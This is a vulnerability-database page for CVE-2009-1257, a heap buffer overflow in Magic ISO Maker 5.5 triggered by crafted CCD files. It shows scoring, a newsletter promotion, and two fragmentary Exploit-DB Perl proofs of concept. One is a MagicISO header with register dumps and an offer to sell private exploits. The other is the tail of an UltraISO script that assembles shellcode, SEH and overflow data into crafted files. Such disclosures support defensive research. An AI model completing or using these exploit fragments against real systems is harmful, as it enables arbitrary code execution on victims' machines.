CVE-2009-1257
published 2009-04-07CVE-2009-1257: Heap-based buffer overflow in Magic ISO Maker 5.5 build 0274 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a…
PriorityP349critical9CVSS 2.0
AVNACLAuNCPIPAC
EXPLOIT
EPSS
13.88%
96.1th percentile
Heap-based buffer overflow in Magic ISO Maker 5.5 build 0274 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted CCD file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| magic_iso_maker | magic_iso_maker | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MagicISO CCD/Cue - Local Heap Overflow (PoC)
exploitdb·2009-04-16
CVE-2009-1257 MagicISO CCD/Cue - Local Heap Overflow (PoC)
MagicISO CCD/Cue - Local Heap Overflow (PoC)
---
#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit Poc
# ----------------------------------------------------------------
# Mountassif Moad
# Stack ..
# Cyber-Zone ..
#
# Private exploits for Kayako, contact me if anyone want buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-'
# Regiter for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Rgister for cue
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBc overwrited 41
# ESP 0012F4D8
# EBP 0012F4E4
# ESI
Exploit-DB
UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow
exploitdb·2009-04-03
CVE-2009-1260 UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow
UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow
---
#!/usr/bin/perl
#
# UltraISO s.img"); #Important: IMG filename must be same as CCD filename.
binmode $img_file;
print $img_file $img_data1.
$overflow1.
$img_data2.
$overflow1.
$img_data3.
$overflow1.
$img_data4;
close $img_file;
open (my $ccd_file, "> s.ccd");
print $ccd_file $ccd_data.
$lookout.$shellcode.$overflow2.$shellhunter.$overflow3.$sehjmp.$sehret.$overflow4;
close $ccd_file;
# milw0rm.com [2009-04-03]
No writeups or analysis indexed.
http://osvdb.org/53262http://secunia.com/advisories/34595http://www.securityfocus.com/bid/34574http://www.vupen.com/english/advisories/2009/0940https://exchange.xforce.ibmcloud.com/vulnerabilities/49673https://www.exploit-db.com/exploits/8343http://osvdb.org/53262http://secunia.com/advisories/34595http://www.securityfocus.com/bid/34574http://www.vupen.com/english/advisories/2009/0940https://exchange.xforce.ibmcloud.com/vulnerabilities/49673https://www.exploit-db.com/exploits/8343
2009-04-07
Published